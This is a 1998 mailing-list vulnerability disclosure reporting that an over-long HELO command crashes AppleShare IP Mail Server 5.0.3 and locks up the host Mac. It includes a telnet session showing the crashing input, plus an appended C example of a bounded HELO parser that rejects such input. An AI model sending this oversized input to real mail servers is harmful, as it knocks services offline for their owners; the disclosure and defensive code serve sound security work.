Date: Wed, 8 Apr 1998 13:11:17 +1200
From: Chris Wedgwood
Subject: AppleShare IP Mail Server

[Yet another buffer overrun? - I hope this isn't getting monotonous]

I noticed this a while back but haven't seen anyone else mention it.

There appears to be what looks like a buffer overrun problem with
AppleShare IP Mail Server. If you connect to the SMTP port and issue a
long string (say 500 bytes or so) the server crashes - and because it's
a Mac, it usually crashes the whole machine to the point where it needs
a reboot.

So far I've only tested against servers which emit the banner
'AppleShare IP Mail Server 5.0.3'

For example:

    $ telnet some.where
    Trying 1.2.3.4...
    Connected to some.where.
    Escape character is '^]'.
    220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
    HELO XXXXXXXXXXX[....several hundred of these....]XXXXXXXX

    [ and it just hangs ]

    $ ping some.where

    [ ...nothing... ]

Physically checking the machine shows it has `locked up' and it needs a
reboot.

I assume if you can cause a crash without the lockup then you might be
able to execute code and do something useful (on a Mac?).

-cw
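
Added example, not part of the original post and not AppleShare code: a bounded HELO parser in C that enforces the RFC 821 size limits (512-byte command line, 64-byte domain) before anything is copied, so an over-long argument gets a 5xx reply instead of overrunning a buffer. The function name smtp_parse_helo and the sample input are hypothetical; the post does not say how the server handles HELO internally.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define SMTP_MAX_LINE   512 /* RFC 821: command line, CRLF included */
#define SMTP_MAX_DOMAIN 64  /* RFC 821: domain name */

/* Hypothetical helper (not from any real server): validate one received
 * line of `len` bytes and copy the HELO argument into `domain`.
 * Returns the SMTP reply code to send: 250, 500 or 501. */
int smtp_parse_helo(const char *line, size_t len,
                    char *domain, size_t domain_size)
{
    size_t start = 5, end, n, i;

    if (domain_size == 0) return 501;
    domain[0] = '\0';
    if (len > SMTP_MAX_LINE) return 500;  /* rejected before any copy */
    if (len < 6 || line[len - 2] != '\r' || line[len - 1] != '\n')
        return 500;                       /* not a complete command line */
    end = len - 2;                        /* index of the CR */
    for (i = 0; i < 4; i++)               /* verb is case-insensitive */
        if (toupper((unsigned char)line[i]) != "HELO"[i]) return 500;
    if (end == 4) return 501;             /* HELO with no argument */
    if (line[4] != ' ') return 500;
    while (start < end && line[start] == ' ')
        start++;
    n = end - start;
    /* The argument must fit both the protocol limit and the caller's buffer. */
    if (n == 0 || n > SMTP_MAX_DOMAIN || n >= domain_size)
        return 501;
    for (i = start; i < end; i++)         /* no spaces, controls or 8-bit */
        if ((unsigned char)line[i] <= ' ' || (unsigned char)line[i] >= 0x7f)
            return 501;
    memcpy(domain, line + start, n);
    domain[n] = '\0';
    return 250;
}

int main(void)
{
    char domain[SMTP_MAX_DOMAIN + 1], line[520];
    /* Constructed input: HELO followed by 500 filler bytes and CRLF. */
    memcpy(line, "HELO ", 5);
    memset(line + 5, 'X', 500);
    memcpy(line + 505, "\r\n", 2);
    printf("%d\n", smtp_parse_helo(line, 507, domain, sizeof domain));
    return 0;
}
```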